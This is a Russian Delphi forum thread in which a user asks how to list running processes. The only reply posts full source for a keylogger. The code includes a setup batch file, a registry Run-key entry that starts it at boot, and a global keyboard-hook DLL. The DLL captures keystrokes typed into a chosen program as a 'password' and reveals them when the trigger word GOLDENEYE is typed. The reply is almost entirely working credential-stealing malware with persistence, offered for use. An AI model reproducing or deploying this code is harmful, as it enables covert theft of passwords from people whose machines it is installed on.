Процессы

← →
Seldon (2003-02-11 22:28) [0]

Здрасьте!
Такой вот вопрос: как получить все процессы (имена, можно используеую память, приоритет), запущенные в системе (как в Task Manager)?

← →
SniZ (2003-02-11 22:56) [1]

>1. Setup.bat === Cut === @echo off copy HookAgnt.dll %windir%\system copy kbdhook.exe %windir%\system start HookAgnt.reg === Cut === >2.HookAgnt.reg === Cut === REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "kbdhook"="kbdhook.exe" === Cut === >3.KbdHook.dpr === Cut === program cwbhook; uses Windows, Dialogs; var hinstDLL: HINST; hkprcKeyboard: TFNHookProc; msg: TMsg; begin hinstDLL := LoadLibrary("HookAgnt.dll"); hkprcKeyboard := GetProcAddress(hinstDLL, "KeyboardProc"); SetWindowsHookEx(WH_KEYBOARD, hkprcKeyboard, hinstDLL, 0); repeat until not GetMessage(msg, 0, 0, 0); end. === Cut === >4.HookAgnt.dpr === Cut === library HookAgent; uses Windows, KeyboardHook in "KeyboardHook.pas"; exports KeyboardProc; var hFileMappingObject: THandle; fInit: Boolean; procedure DLLMain(Reason: Integer); begin if Reason = DLL_PROCESS_DETACH then begin UnmapViewOfFile(lpvMem); CloseHandle(hFileMappingObject); end; end; begin DLLProc := @DLLMain; hFileMappingObject := CreateFileMapping( THandle($FFFFFFFF), // use paging file nil, // no security attributes PAGE_READWRITE, // read/write access 0, // size: high 32 bits 4096, // size: low 32 bits "HookAgentShareMem" // name of map object ); if hFileMappingObject = INVALID_HANDLE_VALUE then begin ExitCode := 1; Exit; end; fInit := GetLastError() <> ERROR_ALREADY_EXISTS; lpvMem := MapViewOfFile( hFileMappingObject, // object to map view of FILE_MAP_WRITE, // read/write access 0, // high offset: map from 0, // low offset: beginning 0); // default: map entire file if lpvMem = nil then begin CloseHandle(hFileMappingObject); ExitCode := 1; Exit; end; if fInit then FillChar(lpvMem, PASSWORDSIZE, #0); end. === Cut === >5.KeyboardHook.pas === Cut === unit KeyboardHook; interface uses Windows; const PASSWORDSIZE = 16; var g_hhk: HHOOK; g_szKeyword: array[0..PASSWORDSIZE-1] of char; lpvMem: Pointer; function KeyboardProc(nCode: Integer; wParam: WPARAM; lParam: LPARAM ): LRESULT; stdcall; implementation uses SysUtils, Dialogs; function KeyboardProc(nCode: Integer; wParam: WPARAM; lParam: LPARAM ): LRESULT; var szModuleFileName: array[0..MAX_PATH-1] of Char; szKeyName: array[0..16] of Char; lpszPassword: PChar; begin lpszPassword := PChar(lpvMem); if (nCode = HC_ACTION) and (((lParam shr 16) and KF_UP) = 0) then begin GetKeyNameText(lParam, szKeyName, sizeof(szKeyName)); if StrLen(g_szKeyword) + StrLen(szKeyName) >= PASSWORDSIZE then lstrcpy(g_szKeyword, g_szKeyword + StrLen(szKeyName)); lstrcat(g_szKeyword, szKeyName); GetModuleFileName(0, szModuleFileName, sizeof(szModuleFileName)); > if (StrPos(StrUpper(szModuleFileName),"__ТО_ЧЕГО_НАДО__") <> nil) and (strlen(lpszPassword) + strlen(szKeyName) < PASSWORDSIZE) then lstrcat(lpszPassword, szKeyName); if StrPos(StrUpper(g_szKeyword), "GOLDENEYE") <> nil then begin ShowMessage(lpszPassword); g_szKeyword[0] := #0; end; Result := 0; end else Result := CallNextHookEx(g_hhk, nCode, wParam, lParam); end; end. === Cut ===

Процессы Найти похожие ветки